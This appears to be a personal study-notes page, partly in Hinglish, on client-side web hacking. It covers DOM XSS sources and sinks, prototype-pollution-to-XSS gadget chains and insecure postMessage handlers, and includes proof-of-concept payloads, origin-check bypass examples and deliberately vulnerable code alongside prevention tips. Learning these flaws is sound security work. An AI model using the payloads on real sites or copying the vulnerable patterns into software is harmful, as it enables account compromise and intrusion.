client side hacking !!

search for the following material !!!

innerHTML outerHTML document.write eval( postMessage( addEventListener("message" location.hash localStorage sessionStorage window.name

1️⃣ “userInput” real world me kya hota hai?

“userInput” koi special word nahi hai. Ye bas user ke control me jo data hai usko represent karta hai.

Real applications me user input kahaan se aata hai:

URL se

https://site.com/?name=ashu

JavaScript me:

var name = location.search;

Yaha name = user input.

URL hash se

https://site.com/#hello

JavaScript:

var data = location.hash;

Yaha data = user input.

Form input

HTML:

<input id="username">

JavaScript:

var user = document.getElementById("username").value;

Yaha user = user input.

LocalStorage

var token = localStorage.getItem("token");

Agar attacker localStorage manipulate kar sake → user input.

postMessage

window.addEventListener("message", function(e){
   var data = e.data;
});

e.data → user input ho sakta hai.

2️⃣ Ab sink kya hota hai?

Sink matlab jagah jahan JavaScript input ko dangerous way me use karta hai.

Example:

element.innerHTML = name;

Agar name user control kar raha hai → danger.

3️⃣ Real example (simple website)

Example website code:

<div id="output"></div>

<script>
var msg = location.hash;
document.getElementById("output").innerHTML = msg;
</script>

Normal user open kare:

site.com/#hello

Page par dikhega:

hello

4️⃣ Attacker kya karega?

Attacker URL change karega:

site.com/#<img src=x onerror=alert(1)>

JavaScript:

var msg = location.hash;

msg ban gaya:

<img src=x onerror=alert(1)>

Phir:

innerHTML = msg

Browser sochta hai:

“ye HTML hai”

Phir:

<img src=x onerror=alert(1)>

execute ho jata hai.

→ XSS

Example code mil gaya

profile.innerHTML = message;

Ab tum puchoge:

message kaha se aa raha hai?

below is the prevention techniques !!

Remember these key points:

Identify sinks where user input could be executed as code
Trace the flow of untrusted data through your application
Implement context-appropriate encoding and sanitization
Use framework-provided protections correctly
Employ defense-in-depth strategies like CSP

DOM Clobbering becomes XSS when the clobbered value reaches a dangerous sink. Common patterns include clobbering configuration objects, URL variables, or callback function references.

Prototype Pollution to XSS

Prototype Pollution is a JavaScript vulnerability where an attacker can inject properties into Object.prototype, affecting all objects in the application. When combined with specific code patterns, prototype pollution can escalate to XSS.

Prototype Pollution Basics

// Vulnerable merge function
function merge(target, source) {
  for (let key in source) {
    if (typeof source[key] === 'object') {
      target[key] = merge(target[key] || {}, source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Attacker-controlled input
const malicious = JSON.parse('{"__proto__":{"isAdmin":true}}');
merge({}, malicious);

// Now ALL objects have isAdmin = true
console.log({}.isAdmin);  // true

Prototype pollution becomes XSS when polluted properties reach dangerous sinks. Many libraries and frameworks check for properties that, if polluted, can lead to code execution.

Prototype Pollution → XSS Chains

// Example 1: jQuery's .attr() gadget
// Pollute: Object.prototype.srcdoc = '<script>alert(1)</script>'
$('<iframe>').attr({});  // srcdoc is read from prototype!

// Example 2: innerHTML with object spread
Object.prototype.innerHTML = '<img src=x onerror=alert(1)>';
element.innerHTML = {...userConfig}.innerHTML;  // XSS!

// Example 3: Template literal gadget
Object.prototype.template = '<img src=x onerror=alert(1)>';
const html = config.template || '<div>default</div>';
element.innerHTML = html;

// Example 4: Event handler pollution
Object.prototype.onclick = 'alert(1)';
// Any element checking for onclick property...

Why is __proto__ special in prototype pollution attacks?

postmessage vulnerbilities !!

The postMessage API enables cross-origin communication between windows. Improper origin validation or unsafe handling of received messages creates XSS opportunities that bypass same-origin restrictions.

Vulnerable PostMessage Patterns

// VULNERABLE: No origin check
window.addEventListener('message', (event) => {
  document.getElementById('output').innerHTML = event.data;
});

// VULNERABLE: Weak origin check (substring match)
window.addEventListener('message', (event) => {
  if (event.origin.indexOf('trusted.com') > -1) {
    // Bypassed with: attacker-trusted.com or trusted.com.evil.com
    eval(event.data.code);
  }
});

// VULNERABLE: Origin check but unsafe handling
window.addEventListener('message', (event) => {
  if (event.origin === 'https://trusted.com') {
    // Safe origin, but dangerous sink!
    document.body.innerHTML = event.data.html;
  }
});

// VULNERABLE: Regex bypass
window.addEventListener('message', (event) => {
  if (/^https:\/\/.*\.trusted\.com$/.test(event.origin)) {
    // Bypassed with: https://evil.trusted.com (if subdomain takeover)
    processData(event.data);
  }
});

// Some code

Previousintlol (my inspirations to start client side hacking) reports NextHTB NOTES (NOT CURRENTLY ACTIVE BUT WILL SHARE NOTES HERE !!!) --> CPTS

Last updated 15 days ago

Was this helpful?

Good evening

hashtag1️⃣ “userInput” real world me kya hota hai?

hashtagURL se

hashtagURL hash se

hashtagForm input

hashtagLocalStorage

hashtagpostMessage

hashtag2️⃣ Ab sink kya hota hai?

hashtag3️⃣ Real example (simple website)

hashtag4️⃣ Attacker kya karega?

hashtagExample code mil gaya

hashtagPrototype Pollution to XSS

hashtagpostmessage vulnerbilities !!

1️⃣ “userInput” real world me kya hota hai?

URL se

URL hash se

Form input

LocalStorage

postMessage

2️⃣ Ab sink kya hota hai?

3️⃣ Real example (simple website)

4️⃣ Attacker kya karega?

Example code mil gaya

Prototype Pollution to XSS

postmessage vulnerbilities !!